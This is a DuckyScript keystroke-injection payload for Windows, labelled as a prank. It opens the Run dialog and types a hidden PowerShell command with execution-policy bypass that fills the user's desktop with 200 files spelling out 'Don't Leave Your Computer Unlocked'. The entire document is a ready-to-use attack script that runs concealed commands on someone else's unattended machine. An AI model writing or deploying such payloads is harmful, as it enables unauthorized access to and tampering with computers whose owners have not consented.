REM ###########################################
REM #                                         |
REM # Title        : Windows Desktop Flood    |
REM # Author       : AbeNaws                  |
REM # Version      : 1.0                      |
REM # Category     : Prank                    |
REM # Target       : Windows                  |
REM #                                         |
REM ###########################################

DELAY 1000
GUI r
DELAY 500
REM                               Repeat count $n=#; 
STRING powershell -w h -NoP -NonI -Exec Bypass $n=200;$d=0;1..$n|%{New-Item -Path "$env:USERPROFILE\Desktop\$(('Don''t_','Leave_','Your_','Computer_','Unlocked_')[$_%5])$($_+1).txt" -ItemType File}
ENTER
